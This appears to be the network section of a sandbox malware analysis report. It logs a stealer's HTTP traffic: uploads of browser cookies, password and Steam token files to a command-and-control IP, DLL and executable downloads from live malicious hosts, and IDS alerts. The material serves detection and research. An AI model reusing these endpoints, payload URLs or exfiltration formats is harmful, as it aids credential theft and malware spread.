Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="file_name"Q29va2ll
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 2d 2d 0d 0a Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_data"------DAKEHIJJKEGIDHIEHDAF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAAHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 2d 2d 0d 0a Data Ascii: ------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_data"------HCBGDGCAAKJEBFIDBAAA--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: 147.45.68.138Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="mode"3------HCAEHJJKFCAAFHJKFBKK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="mode"4------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 147.45.68.138Content-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_data"196mUw==------IEGCBFHJDHJJKFIDBGIJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 147.45.68.138Content-Length: 130725Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCBKKKFHCGCBFIJEHDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="mode"5------EGHCBKKKFHCGCBFIJEHD--
Source: global traffic HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View IP Address: 185.215.113.100 185.215.113.100
Source: Joe Sandbox View ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown DNS query: name: api64.ipify.org
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: iplogger.org
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49717 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49719 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49726 -> 154.216.17.178:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49718 -> 31.41.244.9:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49730 -> 176.111.174.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53042 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:55645 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53051 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49725 -> 76.76.21.98:443
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: file-link-iota.vercel.appCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: youtransfer.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=GqSSlkptWTmvyJO2hxi0bll8qizelqUeJLuZKZ_yI20-1725464264-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=U.nX0IS3oJ70BnB5OMDCq_TanB01xh8k8GEzNt1lp9o-1725464265-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=jncs3kGgV1cnnvz_z.raDYbdJfAkkaPbvt1he_gGuTo-1725464275-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=kC4IYwSAX30bx5L_n1ZLbZ5j4TskBRPpBti46V6lABM-1725464304-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 62.133.61.172
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172Data Ascii: data=swgU6Wof1p8E5IGqIva7FSTNddWPJ2PRWR_zFqsAteOZ8kVhw0F-0kQHJ1FpnKt_dfb1sP_yj3wUoT-rtj_WAIkoyONdm_44_xOXWVRL5ObLyxRBF-HMeieavGJ4KE4p
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172
Source: global traffic HTTP traffic detected: HEAD /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d70775c548d_v.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /edge/msconfig32.exe#pend HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 154.216.17.178Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d707730e9bf_s.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70775c548d_v.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /edge/msconfig32.exe#pend HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 154.216.17.178Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d707730e9bf_s.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
